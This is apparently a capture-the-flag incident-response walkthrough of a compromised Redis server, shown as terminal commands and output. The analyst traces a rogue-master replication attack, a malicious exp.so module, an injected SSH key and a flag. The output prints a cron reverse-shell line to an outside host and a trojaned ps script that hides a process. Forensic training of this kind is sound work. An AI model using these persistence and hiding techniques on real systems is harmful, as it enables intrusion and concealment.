第二章日志分析-redis应急响应

root@ip-10-0-10-3:~# cat /var/log/redis.log* | grep "Connecting" | cut -d" " -f10 | sort | uniq -c

     48 192.168.100.13:8888

      2 192.168.100.20:8888

      1 192.168.31.55:8888

root@ip-10-0-10-3:~# cat /var/log/redis.log|grep -w '192.168.100.20:8888' -C 3

419:S 31 Jul 2023 05:34:03.034 * REPLICAOF 192.168.31.55:8888 enabled (user request from 'id=5 addr=192.168.200.2:64319 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')

419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888

419:S 31 Jul 2023 05:34:03.722 * MASTER <-> REPLICA sync started

419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')

419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888

419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started

419:S 31 Jul 2023 05:34:33.788 * Non blocking connect for SYNC fired the event.

419:S 31 Jul 2023 05:34:35.192 * Master replied to PING, replication can continue...

--

419:S 31 Jul 2023 05:34:35.197 * MASTER <-> REPLICA sync: Loading DB in memory

419:S 31 Jul 2023 05:34:35.197 # Wrong signature trying to load DB from file

419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk

419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888

419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started

419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.

419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so

root@ip-10-0-10-3:~# find / -name "exp.so"

/exp.so

root@ip-10-0-10-3:~# cd /

root@ip-10-0-10-3:/# strings exp.so | grep flag

flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}

_flags2

_flags

root@ip-10-0-10-3:/# crontab -l

# Edit this file to introduce tasks to be run by cron.

# 

# Each task to run has to be defined through a single line

# indicating with different fields when the task will be run

# and what command to run for the task

# 

# To define the time you can provide concrete values for

# minute (m), hour (h), day of month (dom), month (mon),

# and day of week (dow) or use '*' in these fields (for 'any').

# 

# Notice that tasks will be started based on the cron's system

# daemon's notion of time and timezones.

# 

# Output of the crontab jobs (including errors) is sent through

# email to the user the crontab file belongs to (unless redirected).

# 

# For example, you can run a backup of all your user accounts

# at 5 a.m every week with:

# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/

# 

# For more information see the manual pages of crontab(5) and cron(8)

# 

*/1 * * * *  /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1

# m h  dom mon dow   command

root@ip-10-0-10-3:~# cat .ssh/authorized_keys 

REDIS0009�      redis-ver5.0.1�

�edis-bits�@�ctime�tO�dused-mem�XU

 aof-preamble���xxsshB9

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user

�<#5

root@ip-10-0-10-3:~# ls -lthr /usr/bin

...

-rwxr-xr-x 1 root root    131K Jul 31  2023  ps_

-rwxrwxrwx 1 root root     178 Jul 31  2023  ps

root@ip-10-0-10-3:~# cat ps_

cat: ps_: No such file or directory

root@ip-10-0-10-3:~# cat /usr/bin/ps

#/bin/bash

oldifs="$IFS"

IFS='\$n'

result=$(ps_ $1 $2 $3|grep -v 'threadd' )

for v in $result;

do

        echo -e "$v\t";

done

IFS="$oldifs"

#//c195i2923381905517d818e313792d196